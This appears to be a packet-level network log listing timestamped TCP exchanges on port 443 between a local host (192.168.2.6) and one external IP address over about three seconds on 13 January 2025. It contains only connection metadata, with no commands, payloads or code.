Jan 13, 2025 02:06:42.232429981 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.232490063 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.232542992 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.237020969 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.237095118 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.237144947 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.237198114 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.238671064 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.238734961 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.238806009 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.238889933 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.239501953 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.239557028 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.239588022 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.239655018 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.243017912 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.243083954 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.243156910 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.243206978 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.243253946 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.243303061 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.243386984 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.243443966 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.243443966 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.243458033 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.243484974 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.243490934 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.243514061 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.243535042 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.243560076 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.243592978 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.246386051 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.246426105 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.246431112 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.246462107 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.246490955 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.246510029 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.252357960 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.252407074 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.252507925 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.252553940 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.253175974 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.253217936 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.253278017 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.253355980 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.253510952 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.253556013 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.253619909 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.253669024 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.262492895 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.262567043 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.262594938 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.262609959 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.262672901 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.270724058 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.270787954 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.270844936 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.270896912 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.274365902 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.274422884 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.274445057 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.274490118 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.329715014 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.329749107 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.329773903 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.329809904 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.329824924 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.329864025 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.329874992 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.329906940 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.329921961 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.329946995 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.329957962 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.329981089 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.329988003 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.330013037 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.330032110 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.330056906 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.330080032 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.330115080 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.330163002 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.330935001 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.330988884 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.331541061 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.331590891 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.333838940 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.333898067 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.333930969 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.333977938 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.339370966 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.339448929 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.339457989 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.339473963 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.339507103 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.339530945 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.340045929 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.340120077 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.340220928 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.340281963 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.340333939 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.340441942 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.340444088 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.340466976 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.340492964 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.340580940 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.349313974 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.349375963 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.349432945 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.349502087 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.357433081 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.357475996 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.357522964 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.357569933 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.361129999 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.361182928 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.361263037 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.361306906 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.405535936 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.405603886 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.405642033 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.405708075 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.405807972 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.405864954 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.405925989 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.405982018 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.406028986 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.406085968 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.406116009 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.406178951 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.410736084 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.410825968 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.410828114 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.410850048 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.410883904 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.410907030 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.412452936 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.412508011 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.412558079 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.412626982 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.413078070 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.413130045 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.413182020 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.413261890 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.416594028 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.416651011 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.416713953 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.416769028 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.416826963 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.416882038 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.416943073 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.416990042 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.417042971 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.417088985 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.417129993 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.417181969 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.420212984 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.420284986 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.420346975 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.420408010 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.426194906 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.426263094 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.426841974 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.426908970 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.426928043 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.426978111 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.427212954 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.427262068 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.427331924 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.427390099 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.436239004 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.436309099 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.436331987 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.436395884 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.444209099 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.444256067 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.444276094 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.444298029 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.444329023 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.444348097 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.447999001 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.448050976 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.448059082 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.448148012 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.448160887 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.448301077 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.699350119 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.699405909 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:43.135354042 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:43.135530949 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:43.967335939 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:43.967413902 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:43.977596045 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:43.977644920 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:43.977679968 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:43.977719069 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:43.977760077 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:44.158813953 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:44.158834934 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:44.158865929 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:44.158910036 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:44.158922911 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:44.158965111 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:44.158983946 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:44.159018040 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:44.159028053 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:44.159065008 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:44.159092903 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:44.159106016 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:44.159142971 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:44.159154892 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:44.159203053 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:44.159231901 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:44.159250021 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:44.159425974 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:44.159425974 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:44.159442902 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:44.159483910 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:44.159516096 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:44.159562111 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:44.309943914 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:44.309962988 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:44.310091972 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:44.331525087 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:44.331541061 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:44.331577063 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:44.331597090 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:44.331688881 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:44.331701994 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:44.331757069 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:44.331769943 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:44.331815958 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:44.331844091 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:44.331854105 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:44.331904888 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:44.331918955 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:44.331952095 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:44.331979036 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:44.332021952 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:44.332063913 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:44.332110882 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:44.510691881 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:44.510730028 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:44.510826111 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:44.537743092 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:44.537758112 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:44.537790060 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:44.537827015 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:44.537926912 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:44.537940979 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:44.537969112 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:44.538007021 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:44.538038015 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:44.538038015 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:44.538073063 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:44.538106918 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:44.538125992 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:44.538176060 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:44.538228035 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:44.538228035 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:44.538265944 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:44.735584974 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:44.735598087 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:44.735636950 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:44.735655069 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:44.735790014 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:44.735801935 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:44.735816956 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:44.735843897 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:44.735852957 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:44.735862017 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:44.735882044 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:44.736004114 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:44.736011982 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:44.736027002 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:44.736049891 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:44.736064911 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:44.736121893 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:44.943325996 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:44.945487976 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:45.022876024 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:45.022943020 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:45.022984982 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:45.023021936 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:45.023042917 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:45.023076057 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:45.023087978 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:45.023109913 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:45.023139000 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:45.023150921 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:45.023180962 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:45.023180962 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:45.023210049 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:45.059571981 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:45.059596062 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:45.059613943 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:45.059628963 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:45.059742928 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:45.059766054 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:45.059803963 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:45.059834957 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:45.059889078 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:45.060349941 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:45.060396910 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:45.060417891 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:45.060467958 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:45.060523033 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:45.267354965 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:45.270281076 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:45.330480099 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:45.330543995 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:45.330607891 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:45.330693007 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:45.330743074 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:45.330744028 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:45.330797911 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:45.368295908 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:45.368359089 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:45.368443012 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:45.368474960 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:45.368546963 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:45.368570089 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:45.368607998 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:45.368628979 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:45.368684053 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:45.368716002 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:45.368726969 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:45.368767977 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:45.368825912 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:45.368825912 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:45.368884087 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:45.575380087 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:45.577591896 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:45.660945892 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:45.661012888 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:45.661061049 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:45.661118031 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:45.661165953 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:45.704914093 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:45.704978943 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:45.705023050 CET	443	49989	47.101.28.195	192.168.2.6
